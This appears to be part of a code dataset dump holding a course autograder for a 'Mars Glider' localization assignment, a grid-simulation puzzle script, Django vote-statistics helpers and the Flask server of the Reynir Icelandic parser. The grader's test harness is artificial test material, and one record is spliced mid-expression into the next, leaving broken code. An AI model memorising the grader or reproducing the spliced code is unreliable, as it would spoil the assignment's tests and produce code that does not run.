turtle.getscreen()\n s.clearscreen()\n s.tracer(0,1)\n turtle.setup(width=WINDOW_SIZE*2,height=WINDOW_SIZE*2)\n turtle.setworldcoordinates(-WINDOW_SIZE,-WINDOW_SIZE,WINDOW_SIZE,WINDOW_SIZE)\n\n #If the target goes outside the window coordinates,\n #recenter the window on the target.\n if target_pos[0] < X1 or target_pos[0] > X2 or target_pos[1] < Y1 or target_pos[1] > Y2:\n #calculate new bounding rectangle:\n X1 = target_pos[0] - WINDOW_SIZE\n X2 = X1 + 2000\n Y1 = target_pos[1] - WINDOW_SIZE\n Y2 = Y1 + 2000\n turtle.setworldcoordinates(X1,Y1, X2,Y2 )\n\n #Draw a cross at (0,0)\n turtle.penup()\n turtle.setposition(0,-5)\n turtle.pendown()\n turtle.setposition(0,5)\n turtle.penup()\n turtle.setposition(-5,0)\n turtle.pendown()\n turtle.setposition(5,0)\n turtle.penup()\n\n # set starting point for glider trail\n turtle.setposition(target.x, target.y)\n turtle.pencolor(\"red\")\n turtle.pendown()\n turtle.ht()\n\n # create glider target turtle\n target_turtle = turtle.Turtle()\n target_turtle.penup()\n target_turtle.shape(\"triangle\")\n target_turtle.shapesize(0.2, 0.4)\n target_turtle.settiltangle(target.heading * 180 / math.pi )\n target_turtle.pencolor(\"red\")\n target_turtle.fillcolor(\"red\")\n target_turtle.setposition(target.x, target.y)\n\n turtleList = []\n\n try:\n while steps < params['max_steps']:\n 
target_meas = target.sense()\n target_height = target.get_height()\n result = next_angle(target_height, target_meas, studentMapFunc, other_info)\n if len(result) == 3:\n steering, other_info, extra_points = result\n elif len(result) == 2:\n steering, other_info = result\n extra_points = None\n else:\n print(\"next_angle did not return 2 or 3 return values!\")\n\n steering = max( -PI/8.0, steering)\n steering = min( steering, PI/8.0)\n\n target = target.glide(steering)\n\n target_pos = (target.x, target.y)\n separation = self.distance( (0,0) , target_pos)\n\n if PLOT_PARTICLES == True:\n\n if extra_points != None:\n #Add turtles if needed.\n while len(extra_points) > len(turtleList):\n newTurtle = turtle.Turtle()\n newTurtle.penup()\n turtleList.append( newTurtle )\n\n #remove turtles if needed.\n while len(extra_points) < len(turtleList):\n turtleList[-1].hideturtle()\n turtleList = turtleList[0:-1]\n\n # Draw the particles, set angle and position of each turtle.\n for i in range( len(extra_points)) :\n t = turtleList[i]\n p = extra_points[i]\n if len(p) > 2:\n t.shape(\"triangle\")\n t.shapesize(0.2, 0.4)\n t.settiltangle( p[2] * 180 / math.pi)\n else:\n t.shape(\"circle\")\n t.shapesize(0.1, 0.1)\n t.setposition(p[0],p[1])\n\n else: # remove previously displayed\n while 0 < len(turtleList):\n turtleList[-1].hideturtle()\n turtleList = turtleList[0:-1]\n\n # move glider target turtle and trail\n target_turtle.setposition(target.x, target.y)\n target_turtle.settiltangle(target.heading * 180 / math.pi)\n turtle.setposition(target.x, target.y)\n\n #Always show the actual glider on top.\n newFront = target_turtle.clone()\n target_turtle.ht()\n target_turtle = newFront\n\n s = turtle.getscreen()\n s.update()\n\n if VERBOSE == True:\n actual_height = target.z\n ground_height = ourMapFunc(target.x, target.y)\n actual_dist_to_ground = actual_height - ground_height\n print(\"Step: {} Actual Heading ({}) \\n Dist To (0,0) = {}\\n \".format(steps, target.heading, separation ))\n\n if separation < tolerance:\n self.glider_found.put(True)\n self.glider_steps.put(steps)\n return\n\n steps += 1\n\n self.glider_found.put(False)\n self.glider_steps.put(steps)\n\n except:\n self.glider_error.put(traceback.format_exc())\n\n\nNOT_FOUND = \"Part {} - Test Case {}: glider took {} step(s) which exceeded the {} allowable step(s).\"\n\n\nclass CaseRunner(unittest.TestCase):\n \"\"\"Run test case using specified parameters.\n\n Attributes:\n simulator(GliderSimulator): Simulation.\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"Setup test class.\n \"\"\"\n cls.simulator = GliderSimulator()\n\n def run_with_params(self, k, test_params, test_method, student_method):\n \"\"\"Run test case with parameters.\n\n Args:\n k(int): Test case global parameters.\n test_params(dict): Test parameters.\n test_method(func): Test function.\n student_method(func): Student submission function.\n \"\"\"\n test_params.update(GLOBAL_PARAMETERS[k])\n\n error_message = ''\n steps = None\n glider_found = False\n\n if DEBUGGING_SINGLE_PROCESS:\n test_method( student_method, test_params )\n else:\n test_process = mproc.Process(target=test_method, args=(student_method, test_params))\n\n try:\n test_process.start()\n test_process.join(TIME_LIMIT)\n except Exception as exp:\n error_message += str(exp) + ' '\n\n if test_process.is_alive():\n test_process.terminate()\n error_message = ('Test aborted due to CPU timeout. 
' +\n 'Test was expected to finish in fewer than {} second(s).'.format(TIME_LIMIT))\n\n if not error_message:\n if not self.simulator.glider_error.empty():\n error_message += self.simulator.glider_error.get()\n\n if not self.simulator.glider_found.empty():\n glider_found = self.simulator.glider_found.get()\n\n if not self.simulator.glider_steps.empty():\n steps = self.simulator.glider_steps.get()\n\n self.assertFalse(error_message, error_message)\n self.assertTrue(glider_found, NOT_FOUND.format(test_params['part'],\n test_params['test_case'],\n steps,\n test_params['max_steps']))\n\n\n\nclass PartATestCase(CaseRunner):\n \"\"\"Test Part A (localization only, no steering)\n\n Attributes:\n test_method(func): Test function.\n student_method(func): Student submission function.\n params(dict): Test parameters.\n \"\"\"\n def setUp(self):\n \"\"\"Setup for each test case.\n \"\"\"\n\n if marsglider1Exc:\n raise marsglider1Exc\n\n self.test_method = self.simulator.simulate_without_steering\n self.student_method = marsglider.estimate_next_pos\n\n self.params = dict()\n self.params['part'] = 'A'\n\n def test_case01(self):\n self.run_with_params(1, self.params, self.test_method, self.student_method)\n\n def test_case02(self):\n self.run_with_params(2, self.params, self.test_method, self.student_method)\n\n def test_case03(self):\n self.run_with_params(3, self.params, self.test_method, self.student_method)\n\n def test_case04(self):\n self.run_with_params(4, self.params, self.test_method, self.student_method)\n\n def test_case05(self):\n self.run_with_params(5, self.params, self.test_method, self.student_method)\n\n def test_case06(self):\n self.run_with_params(6, self.params, self.test_method, self.student_method)\n\n def test_case07(self):\n self.run_with_params(7, self.params, self.test_method, self.student_method)\n\n def test_case08(self):\n self.run_with_params(8, self.params, self.test_method, self.student_method)\n\n def test_case09(self):\n self.run_with_params(9, self.params, self.test_method, self.student_method)\n\n def test_case10(self):\n self.run_with_params(10, self.params, self.test_method, self.student_method)\n\nclass PartBTestCase(CaseRunner):\n \"\"\"Test Part B (localization and steering back to (0,0) )\n\n Attributes:\n test_method(func): Test function.\n student_method(func): Student submission function.\n params(dict): Test parameters.\n \"\"\"\n\n\n def setUp(self):\n \"\"\"Setup for each test case.\n \"\"\"\n\n if marsglider1Exc:\n raise marsglider1Exc\n\n self.test_method = self.simulator.simulate_with_steering\n self.student_method = marsglider.next_angle\n\n self.params = dict()\n self.params['part'] = 'B'\n\n def test_case01(self):\n self.run_with_params(1, self.params, self.test_method, self.student_method)\n\n def test_case02(self):\n self.run_with_params(2, self.params, self.test_method, self.student_method)\n\n def test_case03(self):\n self.run_with_params(3, self.params, self.test_method, self.student_method)\n\n def test_case04(self):\n self.run_with_params(4, self.params, self.test_method, self.student_method)\n\n def test_case05(self):\n self.run_with_params(5, self.params, self.test_method, self.student_method)\n\n def test_case06(self):\n self.run_with_params(6, self.params, self.test_method, self.student_method)\n\n def test_case07(self):\n self.run_with_params(7, self.params, self.test_method, self.student_method)\n\n def test_case08(self):\n self.run_with_params(8, self.params, self.test_method, self.student_method)\n\n def test_case09(self):\n 
self.run_with_params(9, self.params, self.test_method, self.student_method)\n\n def test_case10(self):\n self.run_with_params(10, self.params, self.test_method, self.student_method)\n\n\n\n# Only run all of the test automatically if this file was executed from the command line.\n# Otherwise, let Nose/py.test do it's own thing with the test cases.\nif __name__ == \"__main__\":\n cases = []\n if PART_A is True: cases.append(PartATestCase)\n if PART_B is True: cases.append(PartBTestCase)\n suites = [unittest.TestSuite(unittest.TestLoader().loadTestsFromTestCase(case)) for case in cases]\n\n total_passes = 0\n\n try:\n for i, suite in zip(list(range(1, 1+len(suites))), suites):\n print(\"====================\\nTests for Part {}:\".format(i))\n\n result = unittest.TestResult()\n suite.run(result)\n\n for x in result.errors:\n print(x[0], x[1])\n for x in result.failures:\n print(x[0], x[1])\n\n num_errors = len(result.errors)\n num_fails = len(result.failures)\n num_passes = result.testsRun - num_errors - num_fails\n total_passes += num_passes\n\n print(\"Successes: {}\\nFailures: {}\\n\".format(num_passes, num_errors + num_fails))\n\n #We cap the maximum score to 101 if they pass more than 12.5 test cases. \n overall_score = total_passes * CREDIT_PER_PASS\n except Exception as e:\n print(e)\n overall_score = 0\n if overall_score > 100:\n print(\"Score above 100:\", overall_score, \" capped to 101!\")\n overall_score = 101\n\n print(\"====================\\nOverall Score: {}\".format(overall_score))\n","sub_path":"7638/Projects/Mars Glider/testing_suite_full.py","file_name":"testing_suite_full.py","file_ext":"py","file_size_in_byte":31867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"591582123","text":"import numpy as np\nimport copy\nlines=[]\nline=input()\nwhile (line!='end'):\n lines.append(line)\n line=input()\ngrid=[]\n\n\ngrid=np.zeros((3,len(lines),len(lines[0])))\n\nfor i in range(0,len(lines)):\n for j in range(0,len(lines[0])):\n if lines[i][j]=='#':\n grid[1,i,j]=1\n\ngridSides=[]\nfor i in [-1,0,1]:\n for j in[-1,0,1]:\n for k in [-1,0,1]:\n if i!=0 or j !=0 or k!=0:\n gridSides.append([i,j,k])\n\n\ndef check(g,i,j,k):\n if i>=0 and j>=0 and k>=0 and i 0:\n stats['reviews'] = {\n 'num_reviewed': num_reviewed,\n 'approval_rate': 100.0*num_approved/num_reviewed,\n 'up_rate': 100.0*recording_votes[0]/num_reviewed,\n 'down_rate': 100.0*recording_votes[1]/num_reviewed\n }\n\n if stats['up_votes'] is None:\n stats['up_votes'] = 0\n\n if stats['down_votes'] is None:\n stats['down_votes'] = 0\n\n if stats['num_approved'] is None:\n stats['num_approved'] = 0\n\n stats['net_vote'] = stats['up_votes'] - stats['down_votes']\n\n return stats\n\n\n# This assumes recording QCs\ndef build_qualitycontrol_stat_dict(queryset):\n\n if not queryset.exists():\n return {\n 'count': 0,\n 'approved': 0,\n 'good': 0,\n 'bad': 0,\n 'trash': 0,\n 'delete': 0,\n 'star': 0,\n 'net_vote': 0\n }\n\n approved = \\\n queryset.filter(approved=True)\n\n goods = queryset.filter(good__gte=1).aggregate(sum=Sum('good'))\n bads = queryset.filter(bad__gte=1).aggregate(sum=Sum('bad'))\n deletes = queryset.filter(trash=True)\n stars = queryset.filter(star__gte=1).aggregate(sum=Sum('star'))\n\n stats = {\n 'count': queryset.count(),\n 'approved': approved.count(),\n 'good': goods['sum'] if goods['sum'] is not None else 0,\n 'bad': bads['sum'] if bads['sum'] is not None else 0,\n 'trash': deletes.count(),\n 'delete': deletes.count(),\n 'star': stars['sum'] if 
stars['sum'] is not None else 0,\n }\n\n stats['net_vote'] = stats['good'] - stats['bad']\n\n return stats\n","sub_path":"corpora/corpus/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"135817311","text":"#!/usr/bin/env python\n\"\"\"\n Reynir: Natural language processing for Icelandic\n\n Main module, URL scraper and web server\n\n Copyright (c) 2015 Vilhjalmur Thorsteinsson\n All rights reserved\n See the accompanying README.md file for further licensing and copyright information.\n\n This module is written in Python 3 for Python 3.4\n\n\"\"\"\n\nimport time\nfrom contextlib import closing\nfrom datetime import datetime\n\nimport re\nfrom bs4 import NavigableString\nfrom collections import OrderedDict, defaultdict\nfrom flask import Flask\nfrom flask import render_template, jsonify\nfrom flask import request\n\nfrom fastparser import Fast_Parser, ParseError, ParseForestPrinter, ParseForestDumper\nfrom grammar import Nonterminal\nfrom ptest import run_test, Test_DB\nfrom reducer import Reducer\nfrom scraper import Scraper\nfrom scraperdb import Scraper_DB, Person\nfrom settings import Settings, ConfigError\nfrom tokenizer import tokenize, TOK\n\n# Initialize Flask framework\n\napp = Flask(__name__)\n\nfrom flask import current_app\n\ndef debug():\n # Call this to trigger the Flask debugger on purpose\n assert current_app.debug == False, \"Don't panic! You're here by request of debug()\"\n\n# Current default URL for testing\n\nDEFAULT_URL = 'http://kjarninn.is/2015/04/mar-gudmundsson-segir-margskonar-misskilnings-gaeta-hja-hannesi-holmsteini/'\n# 'http://www.ruv.is//frett/flottamennirnir-matarlausir-i-einni-kos'\n\n# HTML tags that we explicitly don't want to look at\n\nexclude_tags = frozenset([\"script\", \"audio\", \"video\", \"style\"])\n\n# HTML tags that typically denote blocks (DIV-like), not inline constructs (SPAN-like)\n\nblock_tags = frozenset([\"p\", \"h1\", \"h2\", \"h3\", \"h4\", \"div\",\n \"main\", \"article\", \"header\", \"section\",\n \"table\", \"thead\", \"tbody\", \"tr\", \"td\", \"ul\", \"li\",\n \"form\", \"option\", \"input\", \"label\",\n \"figure\", \"figcaption\", \"footer\"])\n\nwhitespace_tags = frozenset([\"br\", \"img\"])\n\n\nclass TextList:\n\n \"\"\" Accumulates raw text blocks and eliminates unnecessary nesting indicators \"\"\"\n\n def __init__(self):\n self._result = []\n self._nesting = 0\n\n def append(self, w):\n if self._nesting > 0:\n self._result.append(\" [[ \" * self._nesting)\n self._nesting = 0\n self._result.append(w)\n\n def append_whitespace(self):\n if self._nesting == 0:\n # No need to append whitespace if we're just inside a begin-block\n self._result.append(\" \")\n\n def begin(self):\n self._nesting += 1\n\n def end(self):\n if self._nesting > 0:\n self._nesting -= 1\n else:\n self._result.append(\" ]] \")\n\n def result(self):\n return \"\".join(self._result)\n\n\ndef extract_text(soup, result):\n \"\"\" Append the human-readable text found in an HTML soup to the result TextList \"\"\"\n if soup:\n for t in soup.children:\n if type(t) == NavigableString:\n # Text content node\n result.append(t)\n elif isinstance(t, NavigableString):\n # Comment, CDATA or other text data: ignore\n pass\n elif t.name in whitespace_tags:\n # Tags that we interpret as whitespace, such as
and \n result.append_whitespace()\n elif t.name in block_tags:\n # Nested block tag\n result.begin() # Begin block\n extract_text(t, result)\n result.end() # End block\n elif t.name not in exclude_tags:\n # Non-block tag\n extract_text(t, result)\n\n\ndef process_url(url):\n \"\"\" Open a URL and process the returned response \"\"\"\n\n metadata = None\n body = None\n\n # Fetch the URL, returning a (metadata, content) tuple or None if error\n info = Scraper.fetch_url(url)\n\n if info:\n metadata, body = info\n if metadata is None:\n if Settings.DEBUG:\n print(\"No metadata\")\n metadata = dict(heading = \"\",\n author = \"\",\n timestamp = datetime.utcnow(),\n authority = 0.0)\n else:\n if Settings.DEBUG:\n print(\"Metadata: heading '{0}'\".format(metadata.heading))\n print(\"Metadata: author '{0}'\".format(metadata.author))\n print(\"Metadata: timestamp {0}\".format(metadata.timestamp))\n print(\"Metadata: authority {0:.2f}\".format(metadata.authority))\n metadata = vars(metadata) # Convert namedtuple to dict\n\n # Extract the text content of the HTML into a list\n tlist = TextList()\n extract_text(body, tlist)\n text = tlist.result()\n\n # Eliminate soft hyphen and zero-width space characters\n text = re.sub('\\u00AD|\\u200B', '', text)\n\n # Eliminate consecutive whitespace\n text = re.sub(r'\\s+', ' ', text)\n\n # Tokenize the resulting text, returning a generator\n # noinspection PyRedundantParentheses\n return (metadata, tokenize(text))\n\n\ndef profile(func, *args, **kwargs):\n \"\"\" Profile the processing of text or URL \"\"\"\n\n import cProfile as profile\n\n filename = 'Reynir.profile'\n\n pr = profile.Profile()\n result = pr.runcall(func, *args, **kwargs)\n pr.dump_stats(filename)\n\n return result\n\n\ndef parse(toklist, single, use_reducer, dump_forest = False, keep_trees = False):\n \"\"\" Parse the given token list and return a result dict \"\"\"\n\n # Count sentences\n num_sent = 0\n num_parsed_sent = 0\n total_ambig = 0.0\n total_tokens = 0\n sent = []\n sent_begin = 0\n\n # Accumulate parsed sentences in a text dump format\n trees = OrderedDict()\n\n with Fast_Parser(verbose = False) as bp: # Don't emit diagnostic messages\n\n version = bp.version\n rdc = Reducer(bp.grammar)\n\n for ix, t in enumerate(toklist):\n if t[0] == TOK.S_BEGIN:\n num_sent += 1\n sent = []\n sent_begin = ix\n elif t[0] == TOK.S_END:\n slen = len(sent)\n if slen:\n # Parse the accumulated sentence\n err_index = None\n num = 0 # Number of tree combinations in forest\n score = 0 # Reducer score of the best parse tree\n\n try:\n # Parse the sentence\n forest = bp.go(sent)\n if forest:\n num = Fast_Parser.num_combinations(forest)\n\n if single and dump_forest:\n # Dump the parse tree to parse.txt\n with open(\"parse.txt\", mode = \"w\", encoding= \"utf-8\") as f:\n print(\"Reynir parse tree for sentence '{0}'\".format(\" \".join(sent)), file = f)\n print(\"{0} combinations\\n\".format(num), file = f)\n if num < 10000:\n ParseForestPrinter.print_forest(forest, file = f)\n else:\n print(\"Too many combinations to dump\", file = f)\n\n if use_reducer and num > 1:\n # Reduce the resulting forest\n forest, score = rdc.go_with_score(forest)\n assert Fast_Parser.num_combinations(forest) == 1\n\n if Settings.DEBUG:\n print(ParseForestDumper.dump_forest(forest))\n\n num = 1\n\n except ParseError as e:\n forest = None\n # Obtain the index of the offending token\n err_index = e.token_index\n\n if Settings.DEBUG:\n print(\"Parsed sentence of length {0} with {1} combinations, score {2}{3}\"\n .format(slen, num, 
score,\n \"\\n\" + (\" \".join(s[1] for s in sent) if num >= 100 else \"\")))\n if num > 0:\n num_parsed_sent += 1\n # Calculate the 'ambiguity factor'\n ambig_factor = num ** (1 / slen)\n # Do a weighted average on sentence length\n total_ambig += ambig_factor * slen\n total_tokens += slen\n if keep_trees:\n # We want to keep the trees for further processing down the line:\n # reduce and dump the best tree to text\n if num > 1:\n # Reduce the resulting forest before dumping it to text format\n forest = rdc.go(forest)\n trees[num_sent] = ParseForestDumper.dump_forest(forest)\n\n # Mark the sentence beginning with the number of parses\n # and the index of the offending token, if an error occurred\n toklist[sent_begin] = TOK.Begin_Sentence(num_parses = num, err_index = err_index)\n elif t[0] == TOK.P_BEGIN:\n pass\n elif t[0] == TOK.P_END:\n pass\n else:\n sent.append(t)\n\n result = dict(\n version = version,\n tokens = toklist,\n tok_num = len(toklist),\n num_sent = num_sent,\n num_parsed_sent = num_parsed_sent,\n avg_ambig_factor = (total_ambig / total_tokens) if total_tokens > 0 else 1.0\n )\n\n # noinspection PyRedundantParentheses\n return (result, trees)\n\n\ndef create_name_register(result):\n \"\"\" Assemble a register of names and titles from the token list \"\"\"\n tokens = result[\"tokens\"]\n register = { }\n db = Scraper_DB()\n with closing(db.session) as session:\n for t in tokens:\n if t.kind == TOK.PERSON:\n gn = t.val\n for pn in gn:\n # Attempt to look up the name pn.name\n q = session.query(Person).filter_by(name = pn.name).all()\n titles = defaultdict(int)\n for p in q:\n # Collect and count the titles\n titles[p.title] += 1\n if sum(cnt >= 4 for cnt in titles.values()) >= 2:\n # More than one title with four or more instances:\n # reduce the choices to just those and decide based on length\n titles = { key: 0 for key, val in titles.items() if val >= 4 }\n if titles:\n # Pick the most popular title, or the longer one if two are equally popular\n title = sorted([(cnt, len(t), t) for t, cnt in titles.items()])[-1][2]\n # Add it to the register\n register[pn.name] = title\n session.commit()\n result[\"register\"] = register\n if Settings.DEBUG:\n print(\"Register is: {0}\".format(register))\n\n\n@app.route(\"/analyze\", methods=['POST'])\ndef analyze():\n \"\"\" Analyze text from a given URL \"\"\"\n\n url = request.form.get(\"url\", \"\").strip()\n use_reducer = not (\"noreduce\" in request.form)\n dump_forest = \"dump\" in request.form\n metadata = None\n # Single sentence (True) or contiguous text from URL (False)?\n single = False\n keep_trees = False\n\n t0 = time.time()\n\n if url.startswith(\"http:\") or url.startswith(\"https:\"):\n # Scrape the URL, tokenize the text content and return the token list\n metadata, generator = process_url(url)\n toklist = list(generator)\n # If this is an already scraped URL, keep the parse trees and update\n # the database with the new parse\n keep_trees = Scraper.is_known_url(url)\n else:\n # Tokenize the text entered as-is and return the token list\n # In this case, there's no metadata\n toklist = list(tokenize(url))\n single = True\n\n tok_time = time.time() - t0\n\n t0 = time.time()\n\n # result = profile(parse, toklist, single, use_reducer, dump_forest)\n result, trees = parse(toklist, single, use_reducer, dump_forest, keep_trees)\n\n # Add a name register to the result\n create_name_register(result)\n\n parse_time = time.time() - t0\n\n if keep_trees:\n # Save a new parse result\n if Settings.DEBUG:\n print(\"Storing a new 
parse tree for url {0}\".format(url))\n Scraper.store_parse(url, result, trees)\n\n result[\"metadata\"] = metadata\n result[\"tok_time\"] = tok_time\n result[\"parse_time\"] = parse_time\n\n # Return the tokens as a JSON structure to the client\n return jsonify(result = result)\n\n\ndef make_grid(w):\n \"\"\" Make a 2d grid from a flattened parse schema \"\"\"\n\n def make_schema(w):\n \"\"\" Create a flattened parse schema from the forest w \"\"\"\n\n def _part(w, level, suffix):\n \"\"\" Return a tuple (colheading + options, start_token, end_token, partlist, info)\n where the partlist is again a list of the component schemas - or a terminal\n matching a single token - or None if empty \"\"\"\n if w is None:\n # Epsilon node: return empty list\n return None\n if w.is_token:\n return ([ level ] + suffix, w.start, w.end, None, (w.terminal, w.token.text))\n # Interior nodes are not returned\n # and do not increment the indentation level\n if not w.is_interior:\n level += 1\n # Accumulate the resulting parts\n plist = [ ]\n ambig = w.is_ambiguous\n add_suffix = [ ]\n\n for ix, pc in enumerate(w.enum_children()):\n prod, f = pc\n if ambig:\n # Uniquely identify the available parse options with a coordinate\n add_suffix = [ ix ]\n\n def add_part(p):\n \"\"\" Add a subtuple p to the part list plist \"\"\"\n if p:\n if p[0] is None:\n # p describes an interior node\n plist.extend(p[3])\n elif p[2] > p[1]:\n # Only include subtrees that actually contain terminals\n plist.append(p)\n\n if isinstance(f, tuple):\n add_part(_part(f[0], level, suffix + add_suffix))\n add_part(_part(f[1], level, suffix + add_suffix))\n else:\n add_part(_part(f, level, suffix + add_suffix))\n\n if w.is_interior:\n # Interior node: relay plist up the tree\n return (None, 0, 0, plist, None)\n # Completed nonterminal\n assert w.is_completed\n assert w.nonterminal is not None\n return ([level - 1] + suffix, w.start, w.end, plist, w.nonterminal)\n\n # Start of make_schema\n\n if w is None:\n return None\n return _part(w, 0, [ ])\n\n # Start of make_grid\n\n if w is None:\n return None\n schema = make_schema(w)\n assert schema[1] == 0\n cols = [] # The columns to be populated\n NULL_TUPLE = tuple()\n\n def _traverse(p):\n \"\"\" Traverse a schema subtree and insert the nodes into their\n respective grid columns \"\"\"\n # p[0] is the coordinate of this subtree (level + suffix)\n # p[1] is the start column of this subtree\n # p[2] is the end column of this subtree\n # p[3] is the subpart list\n # p[4] is the nonterminal or terminal/token at the head of this subtree\n col, option = p[0][0], p[0][1:] # Level of this subtree and option\n\n if not option:\n # No option: use a 'clean key' of NULL_TUPLE\n option = NULL_TUPLE\n else:\n # Convert list to a frozen (hashable) tuple\n option = tuple(option)\n\n while len(cols) <= col:\n # Add empty columns as required to reach this level\n cols.append(dict())\n\n # Add a tuple describing the rows spanned and the node info\n assert isinstance(p[4], Nonterminal) or isinstance(p[4], tuple)\n if option not in cols[col]:\n # Put in a dictionary entry for this option\n cols[col][option] = []\n cols[col][option].append((p[1], p[2], p[4]))\n\n # Navigate into subparts, if any\n if p[3]:\n for subpart in p[3]:\n _traverse(subpart)\n\n _traverse(schema)\n # Return a tuple with the grid and the number of tokens\n return (cols, schema[2])\n\n\n@app.route(\"/parsegrid\", methods=['POST'])\ndef parse_grid():\n \"\"\" Show the parse grid for a particular parse tree of a sentence \"\"\"\n\n MAX_LEVEL = 
32 # Maximum level of option depth we can handle\n txt = request.form.get('txt', \"\")\n parse_path = request.form.get('option', \"\")\n use_reducer = not (\"noreduce\" in request.form)\n\n # Tokenize the text\n tokens = list(tokenize(txt))\n\n # Parse the text\n with Fast_Parser(verbose = False) as bp: # Don't emit diagnostic messages\n err = dict()\n grammar = bp.grammar\n try:\n forest = bp.go(tokens)\n except ParseError as e:\n err[\"msg\"] = str(e)\n # Relay information about the parser state at the time of the error\n err[\"info\"] = None # e.info\n forest = None\n\n # Find the number of parse combinations\n combinations = 0 if forest is None else Fast_Parser.num_combinations(forest)\n score = 0\n\n if Settings.DEBUG:\n # Dump the parse tree to parse.txt\n with open(\"parse.txt\", mode = \"w\", encoding= \"utf-8\") as f:\n if forest is not None:\n print(\"Reynir parse tree for sentence '{0}'\".format(txt), file = f)\n print(\"{0} combinations\\n\".format(combinations), file = f)\n if combinations < 10000:\n ParseForestPrinter.print_forest(forest, file = f)\n else:\n print(\"Too many combinations to dump\", file = f)\n else:\n print(\"No parse available for sentence '{0}'\".format(txt), file = f)\n\n if forest is not None and use_reducer:\n # Reduce the parse forest\n forest, score = Reducer(grammar).go_with_score(forest)\n if Settings.DEBUG:\n print(ParseForestDumper.dump_forest(forest))\n\n # Make the parse grid with all options\n grid, ncols = make_grid(forest) if forest else ([], 0)\n # The grid is columnar; convert it to row-major\n # form for convenient translation into HTML\n # There will be as many columns as there are tokens\n nrows = len(grid)\n tbl = [ [] for _ in range(nrows) ]\n # Info about previous row spans\n rs = [ [] for _ in range(nrows) ]\n\n # The particular option path we are displaying\n if not parse_path:\n # Not specified: display the all-zero path\n path = [(0,) * i for i in range(1, MAX_LEVEL)]\n else:\n # Disassemble the passed-in path\n\n def toint(s):\n \"\"\" Safe conversion of string to int \"\"\"\n try:\n n = int(s)\n except ValueError:\n n = 0\n return n if n >= 0 else 0\n\n p = [ toint(s) for s in parse_path.split(\"_\") ]\n path = [tuple(p[0 : i + 1]) for i in range(len(p))]\n\n # This set will contain all option path choices\n choices = set()\n NULL_TUPLE = tuple()\n\n for gix, gcol in enumerate(grid):\n # gcol is a dictionary of options\n # Accumulate the options that we want do display\n # according to chosen path\n cols = gcol[NULL_TUPLE] if NULL_TUPLE in gcol else [] # Default content\n # Add the options we're displaying\n for p in path:\n if p in gcol:\n cols.extend(gcol[p])\n # Accumulate all possible path choices\n choices |= gcol.keys()\n # Sort the columns that will be displayed\n cols.sort(key = lambda x: x[0])\n col = 0\n for startcol, endcol, info in cols:\n assert isinstance(info, Nonterminal) or isinstance(info, tuple)\n if col < startcol:\n gap = startcol - col\n gap -= sum(1 for c in rs[gix] if c < startcol)\n if gap > 0:\n tbl[gix].append((gap, 1, \"\", \"\"))\n rowspan = 1\n if isinstance(info, tuple):\n cls = { \"terminal\" }\n rowspan = nrows - gix\n for i in range(gix + 1, nrows):\n # Note the rowspan's effect on subsequent rows\n rs[i].append(startcol)\n else:\n cls = { \"nonterminal\" }\n # Get the 'pure' name of the nonterminal in question\n assert isinstance(info, Nonterminal)\n info = info.name\n if endcol - startcol == 1:\n cls |= { \"vertical\" }\n tbl[gix].append((endcol-startcol, rowspan, info, cls))\n col = endcol\n 
ncols_adj = ncols - len(rs[gix])\n if col < ncols_adj:\n tbl[gix].append((ncols_adj - col, 1, \"\", \"\"))\n # Calculate the unique path choices available for this parse grid\n choices -= { NULL_TUPLE } # Default choice: don't need it in the set\n unique_choices = choices.copy()\n for c in choices:\n # Remove all shorter prefixes of c from the unique_choices set\n unique_choices -= { c[0:i] for i in range(1, len(c)) }\n # Create a nice string representation of the unique path choices\n uc_list = [ \"_\".join(str(c) for c in choice) for choice in unique_choices ]\n if not parse_path:\n # We are displaying the longest possible all-zero choice: find it\n i = 0\n while (0,) * (i + 1) in unique_choices:\n i += 1\n parse_path = \"_\".join([\"0\"] * i)\n\n #debug()\n\n return render_template(\"parsegrid.html\", txt = txt, err = err, tbl = tbl,\n combinations = combinations, score = score,\n choice_list = uc_list, parse_path = parse_path)\n\n\n@app.route(\"/addsentence\", methods=['POST'])\ndef add_sentence():\n \"\"\" Add a sentence to the test database \"\"\"\n sentence = request.form.get('sentence', \"\")\n # The sentence may be one that should parse and give us ideally one result tree,\n # or one that is wrong and should not parse, giving 0 result trees.\n should_parse = request.form.get('shouldparse', 'true') == 'true'\n result = False\n if sentence:\n try:\n with closing(Test_DB.open_db()) as db:\n result = db.add_sentence(sentence, target = 1 if should_parse else 0)\n except Exception as e:\n return jsonify(result = False, err = str(e))\n return jsonify(result = result)\n\n\n@app.route(\"/\")\ndef main():\n \"\"\" Handler for the main (index) page \"\"\"\n\n # Instantiate a dummy parser to access grammar info\n # (this does not cause repeated parsing of the grammar as it is cached in memory)\n bp = Fast_Parser(verbose = False)\n txt = request.args.get(\"txt\", None)\n if not txt:\n txt = DEFAULT_URL\n return render_template(\"main.html\", default_text = txt, grammar = bp.grammar)\n\n\n@app.route(\"/test\")\ndef test():\n \"\"\" Handler for a page of sentences for testing \"\"\"\n\n # Run test and show the result\n bp = Fast_Parser(verbose = False) # Don't emit diagnostic messages\n\n return render_template(\"test.html\", result = run_test(bp))\n\n\n# Flask handlers\n\n# noinspection PyUnusedLocal\n@app.errorhandler(404)\ndef page_not_found(e):\n \"\"\" Return a custom 404 error \"\"\"\n return 'Þessi vefslóð er ekki rétt', 404\n\n@app.errorhandler(500)\ndef server_error(e):\n \"\"\" Return a custom 500 error \"\"\"\n return 'Eftirfarandi villa kom upp: {}'.format(e), 500\n\n\n# Initialize the main module\n\ntry:\n # Read configuration file\n Settings.read(\"Reynir.conf\")\nexcept ConfigError as e:\n print(\"Configuration error: {0}\".format(e))\n quit()\n\nif Settings.DEBUG:\n print(\"Running Reynir with debug={0}, host={1}, db_hostname={2}\"\n .format(Settings.DEBUG, Settings.HOST, Settings.DB_HOSTNAME))\n\n\nif __name__ == \"__main__\":\n\n # Run a default Flask web server for testing if invoked directly as a main program\n\n # Additional files that should cause a reload of the web server application\n # Note: Reynir.grammar is automatically reloaded if its timestamp changes\n extra_files = [ 'Reynir.conf', 'Verbs.conf', 'Main.conf' ]\n\n # Run the Flask web server application\n app.run(debug=Settings.DEBUG, host=Settings.HOST, use_reloader=True,\n extra_files = extra_files)\n\nelse:\n\n # Running as a server module: force the grammar to be pre-loaded in to memory\n with Fast_Parser() as 
